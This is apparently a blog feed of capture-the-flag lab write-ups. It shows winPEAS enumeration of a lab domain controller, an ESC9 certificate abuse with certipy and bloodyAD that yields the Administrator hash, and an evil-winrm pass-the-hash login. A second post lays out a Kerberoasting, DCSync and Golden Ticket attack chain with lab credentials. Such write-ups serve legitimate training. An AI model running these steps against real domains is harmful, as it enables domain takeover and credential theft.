WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Chrome DBs
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history                                         
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for GET credentials in Chrome history                                                                                                  
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history                                         
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Chrome bookmarks
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Opera
WINRM       172.16.55.128   5985   DC01                 Info: if no credentials were listed, you might need to close the browser and try again.                                                                 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Brave Browser                                                                                                    
WINRM       172.16.55.128   5985   DC01                 Info: if no credentials were listed, you might need to close the browser and try again.                                                                 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Internet Explorer (unsupported)                                                                                  
WINRM       172.16.55.128   5985   DC01                 Info: if no credentials were listed, you might need to close the browser and try again.                                                                 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current IE tabs
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history                                         
WINRM       172.16.55.128   5985   DC01               [X] Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.InteropServices.COMException: The server process could not be started because the configured identity is incorrect. Check the username and password.                                                                            
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                --- End of inner exception stack trace ---
WINRM       172.16.55.128   5985   DC01                at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters)                                                                                    
WINRM       172.16.55.128   5985   DC01                at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)                                                        
WINRM       172.16.55.128   5985   DC01                at winPEAS.KnownFileCreds.Browsers.InternetExplorer.GetCurrentIETabs()                                                                                   
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for GET credentials in IE history                                                                                                      
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history                                         
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ IE history -- limit 50
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 http://go.microsoft.com/fwlink/p/?LinkId=255141
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ IE favorites
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Interesting files and registry ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                  
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Putty Sessions
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Putty SSH Host keys
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ SSH keys in registry
WINRM       172.16.55.128   5985   DC01             È If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#ssh-keys-in-registry                                                              
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ SuperPutty configuration files
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Office 365 endpoints synced by OneDrive.                                                                                           
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-19
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-20
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-21-3830242231-3868280746-2763890440-1106                                                                                                     
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-21-3830242231-3868280746-2763890440-1112                                                                                                     
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775                                                                                    
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-18
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Cloud Credentials
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials                           
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Unattend Files
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for common SAM & SYSTEM backups
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for McAfee Sitelist.xml Files
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Cached GPP Passwords
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for possible regs with creds
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#inside-the-registry                                      
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for possible password files in users homes                                                                                             
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials                           
WINRM       172.16.55.128   5985   DC01                 C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml                                                                           
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching for Oracle SQL Developer config files                                                                                                
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Slack files & directories
WINRM       172.16.55.128   5985   DC01               note: check manually if something is found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for LOL Binaries and Scripts (can be slow)                                                                                             
WINRM       172.16.55.128   5985   DC01             È  https://lolbas-project.github.io/
WINRM       172.16.55.128   5985   DC01                [!] Check skipped, if you want to run it, please specify '-lolbas' argument                                                                              
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Outlook download files
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating machine and user certificate files                                                                                                 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb                                                                                             
WINRM       172.16.55.128   5985   DC01               Subject            :
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:44:52 AM
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2026 6:44:52 AM
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 97A1FC96F661B5E0E25802BEEB0856CA7EDE670C                                                                                             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Template           : Template=Domain Controller Authentication(1.3.6.1.4.1.311.21.8.4679832.14812446.16206242.389827.4589012.184.1.28), Major Version Number=110, Minor Version Number=0                                                                          
WINRM       172.16.55.128   5985   DC01               Enhanced Key Usages
WINRM       172.16.55.128   5985   DC01                    Client Authentication     [*] Certificate is used for client authentication!                                                                         
WINRM       172.16.55.128   5985   DC01                    Server Authentication
WINRM       172.16.55.128   5985   DC01                    Smart Card Logon
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb                                                                                             
WINRM       172.16.55.128   5985   DC01               Subject            : CN=dc01.lookback.htb
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:42:50 AM
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2026 6:42:50 AM
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 8D793805B6ADC17E2D7C86545C42BFDEF400BCDA                                                                                             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Template           : DomainController
WINRM       172.16.55.128   5985   DC01               Enhanced Key Usages
WINRM       172.16.55.128   5985   DC01                    Client Authentication     [*] Certificate is used for client authentication!                                                                         
WINRM       172.16.55.128   5985   DC01                    Server Authentication
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb                                                                                             
WINRM       172.16.55.128   5985   DC01               Subject            :
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:44:52 AM
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2026 6:44:52 AM
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 75B9E9D3B9837F6945A39582D2FC4B4D48A72815                                                                                             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Template           : Template=Directory Email Replication(1.3.6.1.4.1.311.21.8.4679832.14812446.16206242.389827.4589012.184.1.29), Major Version Number=115, Minor Version Number=0                                                                               
WINRM       172.16.55.128   5985   DC01               Enhanced Key Usages
WINRM       172.16.55.128   5985   DC01                    Directory Service Email Replication
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb                                                                                             
WINRM       172.16.55.128   5985   DC01               Subject            : CN=dc01.lookback.htb
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:44:52 AM
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2026 6:44:52 AM
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 6F0C0F282C91BEA5395643FED00EDCF70F799D29                                                                                             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Template           : DomainController
WINRM       172.16.55.128   5985   DC01               Enhanced Key Usages
WINRM       172.16.55.128   5985   DC01                    Client Authentication     [*] Certificate is used for client authentication!                                                                         
WINRM       172.16.55.128   5985   DC01                    Server Authentication
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb                                                                                             
WINRM       172.16.55.128   5985   DC01               Subject            : CN=lookback-DC01-CA, DC=lookback, DC=htb                                                                                             
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:42:34 AM
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2030 6:52:33 AM
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 410D6DA24FEB978AA8F2EB937906B07713D5B003                                                                                             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Issuer             : CN=lookback-DC01-CA, DC=lookback, DC=htb                                                                                             
WINRM       172.16.55.128   5985   DC01               Subject            :
WINRM       172.16.55.128   5985   DC01               ValidDate          : 10/19/2025 6:44:52 AM
WINRM       172.16.55.128   5985   DC01               ExpiryDate         : 10/19/2026 6:44:52 AM
WINRM       172.16.55.128   5985   DC01               HasPrivateKey      : True
WINRM       172.16.55.128   5985   DC01               StoreLocation      : LocalMachine
WINRM       172.16.55.128   5985   DC01               KeyExportable      : True
WINRM       172.16.55.128   5985   DC01               Thumbprint         : 1D487661007C25C2362E2206BF0E5E8998B005A7                                                                                             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Template           : Template=Kerberos Authentication(1.3.6.1.4.1.311.21.8.4679832.14812446.16206242.389827.4589012.184.1.33), Major Version Number=110, Minor Version Number=0                                                                                   
WINRM       172.16.55.128   5985   DC01               Enhanced Key Usages
WINRM       172.16.55.128   5985   DC01                    Client Authentication     [*] Certificate is used for client authentication!                                                                         
WINRM       172.16.55.128   5985   DC01                    Server Authentication
WINRM       172.16.55.128   5985   DC01                    Smart Card Logon
WINRM       172.16.55.128   5985   DC01                    KDC Authentication
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching known files that can contain creds in home                                                                                           
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials                           
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for documents --limit 100--
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Office Most Recent Files -- limit 50
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Last Access Date           User                                           Application           Document                                                  
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Recent files --limit 70--
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking inside the Recycle Bin for creds files                                                                                                 
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials                           
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching hidden files or folders in C:\Users home (can be slow)                                                                               
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                  C:\Users\Default User
WINRM       172.16.55.128   5985   DC01                  C:\Users\Default
WINRM       172.16.55.128   5985   DC01                  C:\Users\All Users
WINRM       172.16.55.128   5985   DC01                  C:\Users\Default
WINRM       172.16.55.128   5985   DC01                  C:\Users\All Users\ntuser.pol
WINRM       172.16.55.128   5985   DC01                  C:\Users\All Users
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching interesting files in other users home directories (can be slow)                                                                      
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.                                                                                      
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)                                            
WINRM       172.16.55.128   5985   DC01                  File Permissions "C:\Users\All Users\winPEASx64.exe": administrator  [Allow: AllAccess]                                                                
WINRM       172.16.55.128   5985   DC01                  File Permissions "C:\Users\All Users\Seatbelt.exe": administrator  [Allow: AllAccess]                                                                  
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Linux shells/distributions - wsl.exe, bash.exe                                                                                     
WINRM       172.16.55.128   5985   DC01                 C:\Windows\System32\wsl.exe
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 WSL - no installed Linux distributions found.
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                    /---------------------------------------------------------------------------------\                                                                  
WINRM       172.16.55.128   5985   DC01                    |                             Do you like PEASS?                                  |                                                                  
WINRM       172.16.55.128   5985   DC01                    |---------------------------------------------------------------------------------|                                                                  
WINRM       172.16.55.128   5985   DC01                    |         Learn Cloud Hacking       :     training.hacktricks.xyz                 |                                                                  
WINRM       172.16.55.128   5985   DC01                    |         Follow on Twitter         :     @hacktricks_live                        |                                                                  
WINRM       172.16.55.128   5985   DC01                    |         Respect on HTB            :     SirBroccoli                             |                                                                  
WINRM       172.16.55.128   5985   DC01                    |---------------------------------------------------------------------------------|                                                                  
WINRM       172.16.55.128   5985   DC01                    |                                 Thank you!                                      |                                                                  
WINRM       172.16.55.128   5985   DC01                    \---------------------------------------------------------------------------------/                                                                  
WINRM       172.16.55.128   5985   DC01

think

WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ AD CS misconfigurations for ESC
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/ad-certificates.html                                                      
WINRM       172.16.55.128   5985   DC01             È Check for ADCS misconfigurations in the local DC registry                                                                                                 
WINRM       172.16.55.128   5985   DC01               StrongCertificateBindingEnforcement:  - Allow weak mapping if SID extension missing, may be vulnerable to ESC9.                                           
WINRM       172.16.55.128   5985   DC01               CertificateMappingMethods:  - Strong Certificate mapping enabled.                                                                                         
WINRM       172.16.55.128   5985   DC01               IF_ENFORCEENCRYPTICERTREQUEST set in InterfaceFlags - not vulnerable to ESC11.                                                                            
WINRM       172.16.55.128   5985   DC01               szOID_NTDS_CA_SECURITY_EXT not disabled for the CA - not vulnerable to ESC16.                                                                             
WINRM       172.16.55.128   5985   DC01             È 
WINRM       172.16.55.128   5985   DC01             If you can modify a template (WriteDacl/WriteOwner/GenericAll), you can abuse ESC4                                                                          
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: User  (Rights: WriteProperty,ExtendedRight)                                                                               
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: UserSignature  (Rights: WriteProperty,ExtendedRight)                                                                      
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: ClientAuth  (Rights: WriteProperty,ExtendedRight)                                                                         
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: EFS  (Rights: WriteProperty,ExtendedRight)                                                                                
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: login  (Rights: ExtendedRight)                                                                                            
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: IT-login  (Rights: ExtendedRight)                                                                                         
WINRM       172.16.55.128   5985   DC01               [*] Tip: Abuse with tools like Certipy (template write -> ESC1 -> enroll).

ESC9	`StrongCertificateBindingEnforcement` 为 0（弱映射）	✅ 可配合改名账户利用

ESC9

申请证书

已经改过名的Administrator 身份申请 User 证书

改名方法见Bad Ending-证书欺诈

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# certipy req -u 'administrator @lookback.htb' -p 'ITLogin!2026#Qw' -dc-ip 172.16.55.128 \
  -target dc01.lookback.htb -ca lookback-DC01-CA -template User \
  -out /home/kali/Desktop/hmv/lookback/adminspace_user_direct_20260411
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:172.16.55.128@53 answered The DNS operation timed out.; Server Do53:172.16.55.128@53 answered The DNS operation timed out.; Server Do53:172.16.55.128@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 8
[*] Successfully requested certificate
[*] Got certificate with UPN 'IT-login-user@lookback.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to '/home/kali/Desktop/hmv/lookback/adminspace_user_direct_20260411.pfx'
[*] Wrote certificate and private key to '_home_kali_Desktop_hmv_lookback_adminspace_user_direct_20260411.pfx'

回滚UPN

回滚受控账号 UPN（SID ...-1112）

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u IT-admin -p 'V9bT6itAdmin2026' set object S-1-5-21-3830242231-3868280746-2763890440-1112 userPrincipalName -v IT-login-user@lookback.htb
[+] S-1-5-21-3830242231-3868280746-2763890440-1112's userPrincipalName has been updated

同步时间

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nmap -Pn -p445 --script smb2-time 172.16.55.128

Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-11 07:19 +0000
Nmap scan report for dc01.lookback.htb (172.16.55.128)
Host is up (0.00016s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:2F:A0:3B (Oracle VirtualBox virtual NIC)

Host script results:
| smb2-time: 
|   date: 2026-04-11T07:27:19
|_  start_date: N/A

Nmap done: 1 IP address (1 host up) scanned in 1.29 seconds
                                                                                                        
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# date -s '2026-04-11 07:27:30'      
2026年 04月 11日 星期六 07:27:30 UTC

认证证书

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# proxychains -q certipy auth -pfx /home/kali/Desktop/hmv/lookback/_home_kali_Desktop_hmv_lookback_adminspace_user_direct_20260411.pfx -dc-ip 172.16.55.128
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@lookback.htb'
[*] Using principal: 'administrator@lookback.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lookback.htb': aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34

evil-winrm

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q evil-winrm -i 172.16.55.128 -u administrator -H 'bbabdc192282668fe5190ab0c5150b34'
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                                
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                           
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Getflag

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/qq-group/lookback/

HTB-Aptlabs

呼啸山庄 — Thu, 09 Apr 2026 00:00:00 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/aptlabs/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/aptlabs/

PolarisCTF-BabyDC(Documents)

呼啸山庄 — Mon, 30 Mar 2026 00:00:00 GMT

Castlevania - Description

🦇 血色城堡的试炼

夜色如墨，雾气在古老的塔尖缭绕。
在这片孤悬于暗影海上的废墟之上，Baby_DC 伫立着。城堡的石墙布满岁月的裂纹，残留的铭文仿佛低语着血与权力的秘密。
传说，城堡的深处封印着至高无上的力量——域控之主的遗产。而唯有勇敢、狡黠且敏锐的猎人，才能步入这片黑暗迷宫。

你，是被命运选中的Ctfer。你手持智慧的鞭子，心怀猎魔者的冷冽与坚毅。你的任务，是沿着蛛丝般的漏洞链，一步步解锁城堡的秘密，最终夺取支配之力。

🔮 城堡探秘指南

城堡区域	暗影线索	猎人行动
前庭：破碎的彩窗	IIS 的古老铭文残缺不全，短名如裂纹映出真实文件的轮廓	循着残存的光影，找到被隐藏的卷轴
图书馆：尘封的藏书库	MSSQL 的书架错位排列，Linked Server 的符文彼此共鸣	借由错误的多重咒文，踏入高阶的禁区
地下水脉：沉睡的地道	黑暗中回荡着隐秘的回声，服务之魂在隧道中低语	唤醒支配之力，挖掘幽深的隧道
礼拜堂：幽魂的邮驿室	邮箱如祭祀符文闪烁，信件承载着未被察觉的低语	欺瞒死神的信使，诱出被遗忘的名字与密语
时钟塔：失序的混沌戒指	Kerberos 的齿轮开始逆转，身份与时间失去秩序	双重咒印崩解，开启逆城的大门
血色密室：禁忌的灵魂之匣	Registry Hive 如封存灵魂的容器，机器的记忆在哭泣	窃取三份古文书，汲取魔王的暗影之力
王座室：不灭的护身符	域控之主的权柄凝结为黄金之证，欺骗身份与历史	铸造并注入黄金之证，坐上血红的王座
终焉之间：血之圣杯	Flag 是逆城的核心封印，亦是支配的终点	完成仪式，读取隐藏 Flag，城堡隐于月下

Castlevania - Credentials

步骤	获取方式	凭据	用途
2	IIS 8.3 短文件名 + fuzz	`wuwupor:lovlyBaby`	MSSQL 低权限登录
4	SMTP欺骗	`p2zhh:p2zhh_web`	域用户，用于 Kerberos 查询
6	Kerberoasting/AS-REP + hashcat	`mowen:1maxwell`	Backup Operators 成员
9	注册表 Hive → DCSync	`krbtgt:1e3c4fe72e1383c576b4b3aeef4730a8`	伪造 Golden Ticket
10	Golden Ticket	`Administrator` (伪造)	域管理员权限

Castlevania - Attack Chain

[信息收集] nmap 端口扫描
      ↓
[Web渗透] IIS 8.3 短文件名泄露 → 定向 fuzz → 获取数据库凭据
      ↓
[数据库] MSSQL Linked Server 配置错误 → 低权限提升至 sa
      ↓
[命令执行] xp_cmdshell → 本地命令执行 (xmcve\sqlsvc)
      ↓
[内网探测] 发现 SMTP 邮件 → 获取域用户凭据 p2zhh
      ↓
[域渗透] Kerberoasting / AS-REP Roasting → 破解 mowen 密码
      ↓
[权限提升] Backup Operators → 导出注册表 Hive
      ↓
